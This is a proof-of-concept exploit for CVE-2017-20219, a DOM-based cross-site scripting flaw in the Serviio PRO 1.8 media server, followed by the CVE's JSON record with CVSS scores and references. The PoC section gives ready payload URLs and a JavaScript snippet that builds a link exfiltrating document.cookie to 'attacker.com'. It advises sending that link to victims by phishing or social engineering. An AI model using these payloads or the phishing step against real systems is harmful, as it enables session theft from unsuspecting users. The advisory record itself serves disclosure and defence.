CVE-2017-20219

// CVE-2017-20219 PoC - DOM-based XSS in Serviio PRO 1.8 mediabrowser // Target: Serviio PRO 1.8 DLNA Media Streaming Server // Attack Vector: Inject malicious script via URL parameter to document.write() // PoC URL (encode special characters if needed): // http://target:23424/mediabrowser?<script>alert(document.cookie)</script> // Alternative PoC using event handler: // http://target:23424/mediabrowser?<img src=x onerror=alert(document.domain)> // Example attack scenario: const targetUrl = 'http://target:23424/mediabrowser'; const maliciousPayload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'; const exploitUrl = `${targetUrl}?${maliciousPayload}`; console.log('Exploit URL:', exploitUrl); console.log('Send this URL to victim via phishing email or social engineering'); // When victim visits the URL: // 1. Browser sends request to Serviio server // 2. Server returns page with mediabrowser component // 3. JavaScript reads URL from document.location // 4. Malicious payload is passed to document.write() // 5. Script executes in victim's browser context

{"cve": {"id": "CVE-2017-20219", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:51.527", "lastModified": "2026-04-15T14:56:45.970", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Serviio PRO 1.8 DLNA Media Streaming Server contains a DOM-based cross-site scripting vulnerability that allows attackers to execute arbitrary HTML and script code by injecting malicious payloads. Attackers can craft URLs with malicious input that is read from document.location and passed to document.write() in the mediabrowser component to execute code in a user's browser context."}, {"lang": "es", "value": "Servidor de streaming de medios DLNA Serviio PRO 1.8 contiene una vulnerabilidad de cross-site scripting basada en DOM que permite a los atacantes ejecutar código HTML y de script arbitrario inyectando cargas útiles maliciosas. Los atacantes pueden crear URLs con entrada maliciosa que se lee de document.location y se pasa a document.write() en el componente mediabrowser para ejecutar código en el contexto del navegador de un usuario."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://blogs.securiteam.com/index.php/archives/3094", "source": "[email protected]"}, {"url": "https://cxsecurity.com/issue/WLB-2017050020", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/125647", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/142385", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/serviio-pro-dom-based-cross-site-scripting-via-mediabrowser", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5406.php", "source": "[email protected]"}]}}